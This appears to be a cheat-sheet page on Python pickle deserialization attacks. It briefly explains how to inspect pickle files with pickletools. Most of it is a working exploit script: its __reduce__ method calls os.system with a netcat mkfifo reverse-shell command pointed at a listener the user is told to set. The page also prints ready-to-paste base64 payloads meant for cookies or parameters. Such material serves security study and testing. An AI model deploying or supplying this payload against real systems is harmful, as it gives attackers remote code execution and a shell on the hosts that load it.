Python Deserialization
Python Deserialization
Reference: Exploiting machine learning pickle files — many ML model files (e.g. scikit-learn `.pkl`, PyTorch `.pt`) are plain pickles, so loading an untrusted model carries exactly the code-execution risk shown below.
Pickle¶
Disassemble a pickle file (inspect it without executing it — `pickletools` only parses the opcode stream, unlike `pickle.load`, so it is safe to run on an untrusted file; look for GLOBAL/STACK_GLOBAL references such as `posix system` or `builtins eval` followed by REDUCE):
python -m pickletools <file.pickle>
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
Sample exploit (generates a payload that runs a reverse shell on whatever host unpickles it — never `pickle.loads` the result on a machine you do not intend to compromise; replace `127.0.0.1 1234` with your listener):
import base64, pickle
import _pickle as cPickle
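class RCE(object):
    """Pickle payload that runs a shell command when the pickle is loaded.

    ``__reduce__`` tells pickle to serialize this object as "call
    ``os.system`` with ``cmd``"; the unpickler performs that call on load,
    so the command runs on whatever host calls ``pickle.load(s)``.
    The class body itself is not shipped in the pickle -- only a global
    reference to the function (``posix.system`` on Linux/macOS, see the
    expected output below) and its argument, so the victim needs nothing
    but the standard library.

    Args:
        cmd: shell command to execute on load. Defaults to a netcat
            reverse shell to 127.0.0.1:1234 (replace with your listener;
            ``nc`` must exist on the target).
    """

    DEFAULT_CMD = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 '
                   '| nc 127.0.0.1 1234 > /tmp/f')

    def __init__(self, cmd=DEFAULT_CMD):
        self.cmd = cmd

    def __reduce__(self):
        """Return ``(callable, args)`` that pickle records as a REDUCE call."""
        import os
        # Returning the function object directly pickles as a global
        # reference; the eval('os.system') indirection used previously
        # yielded the same object and therefore the same bytes.
        return (os.system, (self.cmd,))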
if __name__ == '__main__':
    # Emit the payload once via `pickle` and once via `_pickle` (the old
    # cPickle name). Both lines come out identical because `pickle`
    # already delegates to the `_pickle` C implementation in Python 3.
    # The output is base64 so it can be pasted into a cookie/parameter;
    # decoding and unpickling it anywhere runs the reverse shell.
    for dumper in (pickle, cPickle):
        print(base64.urlsafe_b64encode(dumper.dumps(RCE())))
    # Expected output for the default command (protocol 4, posix.system):
    #b'gASVbgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFNybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI-JjEgfCBuYyAxMjcuMC4wLjEgMTIzNCA-IC90bXAvZpSFlFKULg=='
    #b'gASVbgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFNybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI-JjEgfCBuYyAxMjcuMC4wLjEgMTIzNCA-IC90bXAvZpSFlFKULg=='